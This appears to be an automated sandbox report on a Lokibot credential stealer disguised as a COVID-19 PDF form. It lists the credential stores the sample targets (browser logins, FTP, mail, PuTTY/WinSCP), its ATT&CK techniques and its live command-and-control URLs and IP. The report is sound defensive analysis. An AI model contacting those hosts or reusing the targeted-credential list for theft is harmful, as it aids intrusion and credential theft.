                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00406069 GetUserNameW,
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: PopPassword
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: SmtpPassword
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScheduled Task/Job1Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection11Deobfuscate/Decode Files or Information11Input Capture1File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information12Credentials in Registry2System Information Discovery13SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSSecurity Software Discovery221Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion31Cached Domain CredentialsVirtualization/Sandbox Evasion31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe35%VirustotalBrowse
                RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe20%ReversingLabsWin32.Trojan.Wacatac
                RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\qvDFOnW.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\qvDFOnW.exe35%VirustotalBrowse
                C:\Users\user\AppData\Roaming\qvDFOnW.exe20%ReversingLabsWin32.Trojan.Wacatac

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://63.141.228.141/32.php/fn1ToJTMzu3Td11%VirustotalBrowse
                http://63.141.228.141/32.php/fn1ToJTMzu3Td0%Avira URL Cloudsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://www.fonts.combi0%Avira URL Cloudsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://63.141.228.141/32.php/fn1ToJTMzu3Td?qM0%Avira URL Cloudsafe
                http://www.fonts.comrsP0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.fonts.coms0%Avira URL Cloudsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.fonts.com80%URL Reputationsafe
                http://www.fonts.com80%URL Reputationsafe
                http://www.fonts.com80%URL Reputationsafe
                http://www.fonts.com80%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://63.141.228.141/32.php/fn1ToJTMzu3Tdtrue
                • 11%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                  high
                  http://www.fontbureau.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                    high
                    http://www.fontbureau.com/designersGRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                      high
                      http://www.fontbureau.com/designers/?RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/bTheRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers?RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                          high
                          http://www.ibsensoftware.com/RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.tiro.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designersRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221764921.0000000000F67000.00000004.00000040.sdmpfalse
                            high
                            http://www.goodfont.co.krRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fonts.combiRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpfalse
                              high
                              http://www.carterandcone.comlRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.sajatypeworks.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netDRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/cTheRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/staff/dennis.htmRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://fontfabrik.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cnRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                  high
                                  http://63.141.228.141/32.php/fn1ToJTMzu3Td?qMRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fonts.comrsPRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/DPleaseRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers8RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.fonts.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.sandoll.co.krRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fonts.comsRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.urwpp.deDPleaseRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.sakkal.comRECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fonts.com8RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        63.141.228.141
                                        unknownUnited States
                                        33387NOCIXUStrue

                                        General Information

                                        Joe Sandbox Version:32.0.0 Black Diamond
                                        Analysis ID:442954
                                        Start date:01.07.2021
                                        Start time:14:35:31
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 6m 10s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
